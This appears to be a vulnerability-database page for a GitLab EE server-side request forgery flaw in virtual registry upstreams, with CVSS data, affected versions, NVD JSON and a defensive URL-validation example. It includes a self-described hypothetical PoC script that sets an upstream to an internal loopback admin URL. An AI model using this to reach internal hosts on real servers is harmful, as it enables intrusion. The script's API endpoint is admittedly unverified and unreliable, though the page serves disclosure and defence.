Security Vulnerability Report
CVE-2026-7471 CVSS 3.5 LOW

Published: 2026-05-14 06:16:25
Last Modified: 2026-05-14 18:50:48

Description

GitLab has remediated an issue in GitLab EE affecting all versions from 18.8 before 18.9.7, 18.10 before 18.10.6, and 18.11 before 18.11.3 that could have allowed an authenticated user with control of a virtual registry upstream to make requests to internal hosts due to improper validation.

Weakness: CWE-918 (Server-Side Request Forgery). The attacker needs a valid account and the ability to configure a virtual registry upstream URL; the server then fetches from that URL, so a URL pointing at a loopback, private or link-local address turns the GitLab instance into a proxy to hosts it can reach but the user cannot.

CVSS Details

CVSS Score
3.5
Severity
LOW
CVSS Vector
CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:C/C:L/I:N/A:N

Configurations (Affected Products)

cpe:2.3:a:gitlab:gitlab:*:*:*:*:enterprise:*:*:* (GitLab EE >= 18.8.0, < 18.9.7) - VULNERABLE
cpe:2.3:a:gitlab:gitlab:*:*:*:*:enterprise:*:*:* (GitLab EE >= 18.10.0, < 18.10.6) - VULNERABLE
cpe:2.3:a:gitlab:gitlab:*:*:*:*:enterprise:*:*:* (GitLab EE >= 18.11.0, < 18.11.3) - VULNERABLE

Fixed in: 18.9.7, 18.10.6, 18.11.3 (GitLab EE only; the CPE entries carry the enterprise target).

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
```python
# Conceptual PoC for CVE-2026-7471.
# This script demonstrates how an authenticated user might attempt to exploit the SSRF
# by pointing a registry upstream at an internal host. The advisory attributes the issue
# to virtual registry upstream validation; the endpoint and payload below are
# hypothetical (modelled on the shape of the GitLab REST API, not a verified path) and
# must be adapted to the actual upstream-configuration API before they do anything.
import requests

# Configuration
GITLAB_URL = "https://gitlab.example.com"
PRIVATE_TOKEN = "glpat-xxxxxxxxxxxxxxxxxxxx"  # user's personal access token
PROJECT_ID = "123"
MALICIOUS_UPSTREAM = "http://127.0.0.1:8080/admin"  # internal host target
TIMEOUT = 10  # seconds; never issue HTTP calls without a timeout

headers = {
    "PRIVATE-TOKEN": PRIVATE_TOKEN,
    "Content-Type": "application/json",
}


def main() -> None:
    # Step 1: get current registry settings.
    # Endpoint is hypothetical, based on the GitLab API structure for package registries.
    get_url = f"{GITLAB_URL}/api/v4/projects/{PROJECT_ID}/packages/maven"
    response = requests.get(get_url, headers=headers, timeout=TIMEOUT)
    print(f"Current settings status: {response.status_code}")

    # Step 2: update the registry upstream to point at the internal host.
    # This payload simulates the configuration change that triggers the SSRF.
    payload = {"maven": {"forward": {"upstream": MALICIOUS_UPSTREAM}}}
    update_url = f"{GITLAB_URL}/api/v4/projects/{PROJECT_ID}/packages/maven"
    try:
        # json= serialises the body; it replaces the manual data=json.dumps(...) form.
        exploit_response = requests.put(update_url, headers=headers, json=payload, timeout=TIMEOUT)
    except requests.RequestException as e:
        print(f"Error: {e}")
        return

    if exploit_response.status_code == 200:
        print("[+] Successfully configured malicious upstream.")
        print(f"[+] Server may now request internal host: {MALICIOUS_UPSTREAM}")
    else:
        print(f"[-] Failed to configure upstream. Status: {exploit_response.status_code}")
        print(exploit_response.text)


if __name__ == "__main__":
    main()
```
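The "improper validation" the description refers to is the check an upstream URL needs before the server fetches from it. The following is an added example in Python, not GitLab's code and not a reconstruction of the fix: a naive scheme-only check of the kind that lets http://127.0.0.1:8080/admin through, beside a hardened check that resolves the host and rejects any non-public address, returning the vetted addresses so the fetch can be pinned to them. The hostnames, the FAKE_DNS table and the public addresses used as stand-ins are constructed so the block runs offline; a deployment would pass a real resolver such as socket.getaddrinfo.

```python
# Added example (not GitLab code): upstream URL validation against SSRF to internal hosts.
# FAKE_DNS and its hostnames are constructed so this runs offline.
from __future__ import annotations

import ipaddress
from typing import Callable, Iterable
from urllib.parse import urlsplit

Resolver = Callable[[str], Iterable[str]]

# Constructed stand-in for DNS. 8.8.8.8 and 1.1.1.1 stand in for ordinary public hosts
# (RFC 5737 documentation ranges cannot be used here: ipaddress treats them as non-global).
FAKE_DNS = {
    "repo1.maven.org": ["8.8.8.8"],
    "localhost": ["127.0.0.1"],
    "metadata.internal": ["169.254.169.254"],   # cloud metadata endpoint
    "rebind.example": ["1.1.1.1", "10.0.0.5"],  # one public and one private record
}


def fake_resolve(host: str) -> list[str]:
    return FAKE_DNS.get(host.lower(), [])


def naive_upstream_check(url: str) -> bool:
    """The kind of check that is not enough: scheme and host present, nothing about
    where the host points. http://127.0.0.1:8080/admin passes."""
    parts = urlsplit(url)
    return parts.scheme in ("http", "https") and bool(parts.hostname)


def is_internal(ip_text: str) -> bool:
    """True for any address a server-side fetch must not reach: loopback, RFC 1918,
    link-local (including 169.254.169.254), CGNAT, unspecified, documentation and
    reserved ranges. IPv4-mapped IPv6 (::ffff:127.0.0.1) is unwrapped first."""
    addr = ipaddress.ip_address(ip_text)
    if isinstance(addr, ipaddress.IPv6Address) and addr.ipv4_mapped is not None:
        addr = addr.ipv4_mapped
    return not addr.is_global


def validate_upstream(url: str, resolve: Resolver) -> list[str]:
    """Validate an upstream URL and return the resolved addresses that passed.
    The caller should connect to exactly these addresses (sending the original
    hostname in Host/SNI) rather than resolving again at fetch time; otherwise a
    DNS answer that changes between check and use bypasses the check."""
    parts = urlsplit(url)
    if parts.scheme not in ("http", "https"):
        raise ValueError(f"scheme not allowed: {parts.scheme!r}")
    host = parts.hostname
    if not host:
        raise ValueError("URL has no host")
    if parts.username is not None or parts.password is not None:
        raise ValueError("credentials belong in a separate field, not the URL")
    try:
        # Literal address: no lookup needed. Shorthand forms such as "127.1" or
        # "2130706433" are rejected by ipaddress and fall through to the resolver,
        # which (like getaddrinfo) expands them, so they are still caught below.
        addrs = [str(ipaddress.ip_address(host))]
    except ValueError:
        addrs = [str(a) for a in resolve(host)]
    if not addrs:
        raise ValueError(f"host does not resolve: {host}")
    for a in addrs:
        # Every record must be public: a mixed answer is how a private target is
        # smuggled past a check that only looks at the first address.
        if is_internal(a):
            raise ValueError(f"{host} resolves to non-public address {a}")
    return addrs


def check_upstream(url: str, resolve: Resolver = fake_resolve) -> tuple[bool, str]:
    """Non-raising wrapper: (accepted, resolved addresses or rejection reason)."""
    try:
        return True, ",".join(validate_upstream(url, resolve))
    except ValueError as exc:
        return False, str(exc)


if __name__ == "__main__":
    for candidate in (
        "https://repo1.maven.org/maven2/",
        "http://127.0.0.1:8080/admin",
        "http://[::ffff:127.0.0.1]/admin",
        "http://metadata.internal/latest/meta-data/",
        "http://rebind.example/",
        "ftp://repo1.maven.org/",
    ):
        print(candidate, "naive:", naive_upstream_check(candidate), "hardened:", check_upstream(candidate))
```

Two caveats a practitioner would want. First, the check is only as good as what the fetcher does afterwards: it must connect to the returned addresses and must re-run the same check on every redirect target, since a public upstream that 302s to http://169.254.169.254/ defeats a check applied only to the configured URL. Second, `is_global` is deliberately broader than "not RFC 1918"; it also excludes link-local, CGNAT and reserved space, which is the behaviour you want for a server-side fetch.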

References

https://about.gitlab.com/releases/2026/05/13/patch-release-gitlab-18-11-3-released/ (Release Notes)
https://gitlab.com/gitlab-org/gitlab/-/work_items/594196 (tagged "Broken Link" in the NVD record; the GitLab issue is typically made public some time after the patch release)
Raw JSON Data

```json
{
  "cve": {
    "id": "CVE-2026-7471",
    "sourceIdentifier": "[email protected]",
    "published": "2026-05-14T06:16:25.477",
    "lastModified": "2026-05-14T18:50:47.943",
    "vulnStatus": "Analyzed",
    "cveTags": [],
    "descriptions": [
      {
        "lang": "en",
        "value": "GitLab has remediated an issue in GitLab EE affecting all versions from 18.8 before 18.9.7, 18.10 before 18.10.6, and 18.11 before 18.11.3 that could have allowed an authenticated user with control of a virtual registry upstream to make requests to internal hosts due to improper validation."
      }
    ],
    "metrics": {
      "cvssMetricV31": [
        {
          "source": "[email protected]",
          "type": "Secondary",
          "cvssData": {
            "version": "3.1",
            "vectorString": "CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:C/C:L/I:N/A:N",
            "baseScore": 3.5,
            "baseSeverity": "LOW",
            "attackVector": "NETWORK",
            "attackComplexity": "HIGH",
            "privilegesRequired": "LOW",
            "userInteraction": "NONE",
            "scope": "CHANGED",
            "confidentialityImpact": "LOW",
            "integrityImpact": "NONE",
            "availabilityImpact": "NONE"
          },
          "exploitabilityScore": 1.8,
          "impactScore": 1.4
        }
      ]
    },
    "weaknesses": [
      {
        "source": "[email protected]",
        "type": "Primary",
        "description": [
          {"lang": "en", "value": "CWE-918"}
        ]
      }
    ],
    "configurations": [
      {
        "nodes": [
          {
            "operator": "OR",
            "negate": false,
            "cpeMatch": [
              {
                "vulnerable": true,
                "criteria": "cpe:2.3:a:gitlab:gitlab:*:*:*:*:enterprise:*:*:*",
                "versionStartIncluding": "18.8.0",
                "versionEndExcluding": "18.9.7",
                "matchCriteriaId": "3B168A5B-5B96-48AA-882D-77529BCA8006"
              },
              {
                "vulnerable": true,
                "criteria": "cpe:2.3:a:gitlab:gitlab:*:*:*:*:enterprise:*:*:*",
                "versionStartIncluding": "18.10.0",
                "versionEndExcluding": "18.10.6",
                "matchCriteriaId": "E79D4F10-88B3-4AA7-BC5E-3FC8FA698969"
              },
              {
                "vulnerable": true,
                "criteria": "cpe:2.3:a:gitlab:gitlab:*:*:*:*:enterprise:*:*:*",
                "versionStartIncluding": "18.11.0",
                "versionEndExcluding": "18.11.3",
                "matchCriteriaId": "DA0D6580-3530-4D76-81CE-D852BCE0D411"
              }
            ]
          }
        ]
      }
    ],
    "references": [
      {
        "url": "https://about.gitlab.com/releases/2026/05/13/patch-release-gitlab-18-11-3-released/",
        "source": "[email protected]",
        "tags": ["Release Notes"]
      },
      {
        "url": "https://gitlab.com/gitlab-org/gitlab/-/work_items/594196",
        "source": "[email protected]",
        "tags": ["Broken Link"]
      }
    ]
  }
}
```